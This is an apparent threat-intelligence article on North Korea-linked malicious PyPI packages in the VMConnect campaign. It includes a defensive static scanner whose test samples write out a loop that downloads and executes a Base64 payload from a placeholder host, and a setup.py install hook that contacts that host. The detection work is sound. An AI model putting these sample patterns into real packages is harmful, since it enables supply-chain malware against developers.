Researchers at ReversingLabs have found that the VMConnect campaign, in which North Korean state-sponsored threat actors seed the Python Package Index (PyPI) with malicious packages, is still active. The campaign has drawn attention in the security community because of its persistence and the way it keeps adapting to evade detection.

Description

The VMConnect campaign began with roughly two dozen malicious Python packages [2] and has since expanded [2]. The attackers rely on typosquatting: the package names imitate popular open-source Python tools so that the uploads look legitimate to a developer skimming search results or a requirements file [5].

ReversingLabs has now identified three further malicious packages, tablediter, request-plus and requestspro [2] [5], believed to belong to the same extended campaign [1] [2]. tablediter runs a loop that periodically contacts a remote server, retrieves a Base64-encoded payload and executes it [5]; the content of that payload has not been recovered. To evade detection, the package no longer fires its malicious code at installation time [5]. request-plus and requestspro instead gather information about the infected machine and send it to a command-and-control server [5]. The server replies with a token, which the infected host returns in order to receive a double-encoded Python module and a download URL [5]; the decoded module is suspected to fetch the next stage of the malware [5].

A notable feature of the campaign is that the malicious code stays dormant until a package is imported and used by a legitimate application, rather than running during installation, which lets it slip past checks that only watch install-time behaviour [2]. The campaign has been linked to the Lazarus Group, a North Korean state-sponsored threat actor [2] [5]. Code overlaps between the VMConnect packages and malware previously documented by JPCERT/CC point to Lazarus and therefore to North Korean state sponsorship [4]. Analysis of the packages also revealed links to earlier campaigns attributed to Labyrinth Chollima [3], a subgroup of Lazarus [3], and both JPCERT/CC and CrowdStrike have corroborated the Lazarus connection [3].
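The two paragraphs above describe three behaviours a defender can look for before a package is ever imported: a loop that polls a remote host and executes a Base64-decoded blob, a package that phones home with host details, and code placed so that it runs at import time rather than at install time (or, conversely, a setup.py install hook that runs during `pip install`). The following scanner is an added example written for this page, not ReversingLabs' tooling or any code from the packages themselves. It parses source with Python's `ast` module so nothing in the scanned files is executed, and it reports at which stage each flagged file would run. The package name `examplepkg`, the `.invalid` hosts and all three sample sources are constructed for the demonstration.

```python
"""Added example (not ReversingLabs' tooling): static triage of a package for the
behaviours described above. Uses `ast`, so nothing in the scanned source runs."""
import ast

DECODE_CALLS = {"base64.b64decode", "base64.b32decode", "base64.b85decode", "b64decode"}
EXEC_CALLS = {"exec", "eval", "compile"}
NETWORK_CALLS = {"urllib.request.urlopen", "urlopen", "requests.get", "requests.post",
                 "socket.create_connection"}
SLEEP_CALLS = {"time.sleep", "sleep"}
INSTALL_HOOK_BASES = {"install", "setuptools.command.install.install", "develop"}

def dotted_name(node):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, or None otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def call_names(node):
    return {dotted_name(n.func) for n in ast.walk(node) if isinstance(n, ast.Call)} - {None}

class Triage(ast.NodeVisitor):
    def __init__(self):
        self.findings = []  # (indicator, line number) in source order

    def visit_Call(self, node):
        name = dotted_name(node.func)
        if name in EXEC_CALLS and call_names(node) & DECODE_CALLS:
            # exec()/eval() fed by a base64 decode: the fetch-decode-run pattern
            self.findings.append(("decode-and-exec", node.lineno))
        elif name in NETWORK_CALLS:
            self.findings.append(("network", node.lineno))
        self.generic_visit(node)

    def visit_While(self, node):
        # a loop that both reaches the network and sleeps is a beacon/poller
        names = call_names(node)
        if names & NETWORK_CALLS and names & SLEEP_CALLS:
            self.findings.append(("polling-loop", node.lineno))
        self.generic_visit(node)

    def visit_ClassDef(self, node):
        # subclassing setuptools' install command runs code at `pip install` time
        if {dotted_name(b) for b in node.bases} & INSTALL_HOOK_BASES:
            self.findings.append(("install-hook", node.lineno))
        self.generic_visit(node)

def scan_source(source, filename="<string>"):
    visitor = Triage()
    visitor.visit(ast.parse(source, filename=filename))
    return visitor.findings

def scan_package(files):
    """files: {path: source}. Files with findings, tagged by when that code runs."""
    report = {}
    for path, source in files.items():
        findings = scan_source(source, path)
        if findings:
            stage = "install-time" if path.endswith("setup.py") else "import-time"
            report[path] = {"stage": stage, "findings": findings}
    return report

def verdict(report):
    kinds = {k for entry in report.values() for k, _ in entry["findings"]}
    if kinds & {"decode-and-exec", "polling-loop", "install-hook"}:
        return "suspicious"
    return "review" if kinds else "clean"

# Constructed, inert samples for a hypothetical package "examplepkg" (.invalid hosts).
SAMPLE_INIT = """\
import base64, time, urllib.request

def _poll():
    # periodically fetch a base64 blob from a remote host and run it
    while True:
        blob = urllib.request.urlopen("http://c2.example.invalid/p").read()
        exec(base64.b64decode(blob))
        time.sleep(60)
"""

SAMPLE_SETUP = """\
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    # runs during `pip install`, before the package is ever imported
    def run(self):
        install.run(self)
        urllib.request.urlopen("http://c2.example.invalid/r")

setup(name="examplepkg", cmdclass={"install": PostInstall})
"""

SAMPLE_CLEAN = "import json\n\ndef load(path):\n    with open(path) as fh:\n        return json.load(fh)\n"
```

To run it against a real download, unpack the sdist or wheel and pass `scan_package({str(p): p.read_text() for p in pathlib.Path(root).rglob("*.py")})`. The `stage` tag is the point the article makes: a hit in `setup.py` fires at `pip install`, whereas a hit in `__init__.py` stays silent until something imports the package, so a sandbox that only observes installation will miss the second kind. Treat the output as a triage aid, not a verdict: obfuscated code can hide the call names this scanner matches on, and a benign package can legitimately poll a server.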

Conclusion

The VMConnect campaign illustrates the growing threat of software supply chain attacks and the need for layered defences. It has targeted macOS, Linux [3] and Windows systems and is attributed to the North Korean threat group Lazarus [3]. Cooperation between the private and public sectors is needed to ensure software assurance and provenance [1]. Organizations should verify the provenance of third-party packages before installing them, and maintain threat-intelligence and incident-response programmes that account for the evolving tactics of North Korean cyber operations.

References

[1] https://www.scmagazine.com/news/vmconnect-campaign-linked-to-north-korean-lazarus-group
[2] https://www.infosecurity-magazine.com/news/pypi-targeted-vmconnect/
[3] https://dig.watch/updates/lazarus-group-linked-to-malicious-vmconnect-campaign
[4] https://cybersecuritynews.com/malicious-pypi-repository/
[5] https://www.redpacketsecurity.com/north-korean-hackers-deploy-new-malicious-python-packages-in-pypi-repository/